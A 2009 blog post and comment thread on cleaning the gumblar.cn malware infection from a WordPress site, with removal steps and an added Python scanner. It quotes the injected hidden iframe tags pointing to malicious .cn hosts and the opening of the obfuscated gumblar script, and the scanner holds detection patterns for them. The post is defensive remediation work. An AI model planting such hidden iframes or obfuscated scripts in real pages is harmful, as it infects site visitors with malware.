How to protect your website from gumblar.cn infection

Posted on 06. May, 2009 by Tahir Akram in Blogging

Yesterday one of my websites was infected by malware served from gumblar.cn. That domain hosts several exploits and trojans that can harm a visitor's system. It begins its infection by invoking Adobe Acrobat Reader on your machine: after browsing my infected site, I found an Acrobat Reader process running in Task Manager.

According to the Google Safe Browsing service:

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

I found that some of my PHP files had been altered by adding an iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php, <my-url>/wp-admin/index.php and, in the same directory, index-extra.php. I did not find any other file infected by this.

I manually removed this embedded iframe, <iframe src="http://liteautotop .cn/ts/in.cgi?mozila" width=2 height=4 style="visibility: hidden"></iframe>, and everything works fine.

If you have any information about this infection, please share it; the many people searching the internet for a solution to this problem will appreciate it.

Update (5/11/09): I was able to remove this malware from my blog and WordPress admin site.

Removal

  • Removed the malicious image.php file from every images folder. The image.php infection was only found in 'image' folders. Make sure you don't remove an original image.php file; if your original file is infected, remove only the malicious code.
  • Looked for iframe code added at the top or bottom of each PHP page and removed it. This is the iframe I found and removed: <iframe src="http: //bigtruckstopseek .cn/ts/in.cgi?banner2" width=2 height=4 style="visibility: hidden">
  • Checked all PHP, HTML and JS files for added anonymous JavaScript functions. I found every JS file in the wp-include directory infected.
  • Set the httpdoc directory permissions to 755.
  • Scanned my computer with Malwarebytes' Anti-Malware, which identified and removed several threats.
  • Updated my AVG Anti-Virus.
  • Changed my FTP password.
  • I did all of this manual code removal from my Plesk control panel.
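As an added example that is not part of the original post, here is a Python script that checks a web root for what the removal steps above look for: a hidden iframe appended to PHP, HTML or JS files, an image.php dropped into an images folder, and directories left world-writable (the 'Other' write bit that the 755 step removes); it also flags the opening of the obfuscated anonymous function Denis quotes in comment 5. The directory layout, file contents and regular expressions are my own constructed placeholders, not signatures from any tool, and the world-writable check assumes a Unix-like filesystem.

```python
import os
import re
import stat
import tempfile

# Hidden iframe as removed in the post: single-digit width/height plus visibility:hidden.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?\d\b[^>]*visibility:\s*hidden", re.I)
# Start of the obfuscated IIFE Denis quotes in comment 5: a variable holding the '%' escape prefix.
OBF_IIFE = re.compile(r"\(function\(\)\{var\s+\w+\s*=\s*'%'")

def scan_webroot(root):
    """Walk a web root and return sorted (finding, relative_path) pairs."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:  # any account on the host can drop files here
            findings.append(("world-writable-dir", os.path.relpath(dirpath, root)))
        if os.path.basename(dirpath).lower() in {"image", "images"} and "image.php" in filenames:
            findings.append(("image.php-in-images-dir", os.path.relpath(os.path.join(dirpath, "image.php"), root)))
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in {".php", ".html", ".htm", ".js"}:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                data = fh.read()
            if HIDDEN_IFRAME.search(data):
                findings.append(("hidden-iframe", os.path.relpath(path, root)))
            if OBF_IIFE.search(data):
                findings.append(("obfuscated-iife", os.path.relpath(path, root)))
    return sorted(findings)

def build_sample_site():
    """Create a constructed throw-away tree with harmless placeholder content; return its path."""
    old_umask = os.umask(0o022)  # so makedirs creates 755 directories (the post's setting) whatever the caller's umask
    root = tempfile.mkdtemp(prefix="gumblar-scan-")
    theme = os.path.join(root, "wp-content", "themes", "mytheme")
    images, wp_inc, wp_admin = os.path.join(theme, "images"), os.path.join(root, "wp-includes"), os.path.join(root, "wp-admin")
    for d in (images, wp_inc, wp_admin):
        os.makedirs(d)
    os.umask(old_umask)
    os.chmod(images, 0o777)  # the weak, world-writable setting the post tightened
    files = {
        os.path.join(theme, "index.php"): '<?php get_header(); ?>\n<iframe src="http://example.invalid/in.cgi" width=2 height=4 style="visibility: hidden"></iframe>\n',
        os.path.join(images, "image.php"): "<?php /* constructed placeholder, not the real dropper */ ?>\n",
        os.path.join(wp_inc, "jquery.js"): "(function(){var CEz9t='%';/* placeholder */})();\n",
        os.path.join(wp_admin, "index.php"): "<?php echo 'clean'; ?>\n",  # control file: must not be flagged
    }
    for path, body in files.items():
        with open(path, "w") as fh:
            fh.write(body)
    return root
```

Run `scan_webroot("/path/to/httpdocs")` against a real tree and treat every finding as a file to inspect by hand, since a legitimate image.php or a deliberately hidden iframe will be reported too.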

Please feel free to comment with your suggestions for further security measures to prevent such threats.


22 Responses to “How to protect your website from gumblar.cn infection”

  1. Gaurav

    06. May, 2009

    Yes – one of my clients has also been infected by this malware. Every time we remove it, it manages to creep back into the system.

    Most professionals are using Avast on their computer and secure FTP while uploading files onto the server.

    This is the best information that I have read so far. Perhaps it could be useful for someone.

    http://www.dynamicdrive.com/forums/showthread.php?t=43390&page=3

    If there is any more valuable information, we would be keen to learn it.

  2. Tahir Akram

    06. May, 2009

    Thanks Gaurav for your comments.

    I will consider the software that you recommend for secure uploading. After my manual removal, it hasn't been injected into my files any more.

    I also recommend that hosting providers upgrade their Linux machines with the latest security patches. A Linux machine without security patches is the most vulnerable.

  3. adel sarlak

    08. May, 2009

    I found this virus 10 days ago and 4 of my customers got it.

    We removed it more than 10 times, but the next day, amazingly, it was on all pages again.

    I found the source file.

    In each "Images" folder in your site it will copy a PHP file, "image.php".

    Before removing the script from the pages, you must write a replacement file in place of image.php and change the permissions.

    Then remove the scripts.

    If your site gets the iframe version, as fast as you can you must remove the iframe, then replace the image.php.

    Because Google may consider your site a harmful site.

    The good news is that .asp files won't get this virus.

    Another thing is that, in CMS sites, I changed the permissions of the template folders!!!

  4. Tahir Akram

    08. May, 2009

    Thanks adel. The same is happening to me. After removing the iframe code from my infected pages, I found it appeared again. What you said about image.php and changing the permissions of the theme folder looks very helpful. Let's see whether, after following this, this malware infection is removed permanently or not.

  5. Denis

    08. May, 2009

    Tahir,

    Unfortunately your site is still infected, both with the iframe from “bigtruckstopseek .cn” (which is actually not the gumblar exploit) and with the real “gumblar” script, which can be found right before the body tag. It starts with “(function(){var CEz9t=’%';var fQJ=(‘va.72.20a.3d.22S…“.

    Read my article about this exploit. There are many comments with additional information that may help you get rid of this exploit.
    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

  6. Tahir Akram

    09. May, 2009

    I have found enough files infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell you, I used fact no. 10 given in your blog. And I was also able to remove the iframe for bigtruckstopseek.cn/ts/in.cgi?banner2. Your blog is very helpful.

  7. Lloyd Jacob Lopez

    09. May, 2009

    Hi Guys,

    I had the same issue: after cleaning the file, it came back again. The problem seems to be that you might have given global access to the folder. When I removed that access and gave read-only and write access to admin, the problem was solved.

    Guys check and let me know if it works.

    Regards,
    Lloyd

  8. Tahir Akram

    10. May, 2009

    Lloyd, what chmod are you using for your directories? The problem for me is that if I remove write and execute access from the ‘Other’ group, my blog appears as a blank page. So I am wondering what chmod will suit my situation. Any idea…

  9. Denis

    10. May, 2009

    Here you will find “Permission Scheme for WordPress”
    http://codex.wordpress.org/Changing_File_Permissions

    Here is another good article to read:
    http://codex.wordpress.org/Hardening_WordPress

  10. ST

    10. May, 2009

    @Tahir Akram: I’d say start with chmod 755. That will prevent anyone except for the owner from having write access.

  11. Tahir Akram

    11. May, 2009

    Thanks Denis, ST, Gaurav, adel & Lloyd for your comments and support to remove this threat.

    I have successfully removed this threat from my blog and WordPress admin. And I pretty much followed what you said. I have updated the post with my course of action. Please feel free to comment.

    Again thanks.

  12. Amir

    12. May, 2009

    Hello,
    For a few days now, when I open my site my Persian.be antivirus reports that the application firefox connects to web page gumblar .cn/rrs/?id=, used to steal passwords, credit card numbers or other confidential data. Denied.
    What can I do to fix it?

  14. Tahir Akram

    13. May, 2009

    Amir, you need to follow the steps given in this post and by Denis (comment no. 5).

  15. Gagan Sodhi

    21. May, 2009

    I want to get rid of the gumblar.cn problem, so could you please help me?

  16. Gagan Sodhi

    21. May, 2009

    Hi all,
    I want this gumblar problem to not come back again. Please help me.

  17. Tahir Akram

    22. May, 2009

    Hi Gagan,

    Did you follow the steps given in this post and discussion? I hope you will get rid of it, as I did. Just start on it.

  18. Naresh

    23. May, 2009

    We found a script. Please help me with how to protect our site from gumblar.cn infection.

  19. Tahir Akram

    23. May, 2009

    Naresh, please share your findings here to let us know what remedy steps you require.

  20. rm

    01. Jun, 2009

    Don’t forget the error documents of your website, even if they reside outside of the httpdocs tree.
    Access was gained via FTP, so please check where your FTP login has access (i.e. httpdocs, httpsdocs, cgi-bin, errordocs, …).

    Next, CHECK YOUR COMPUTER, for you will have been infected. http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
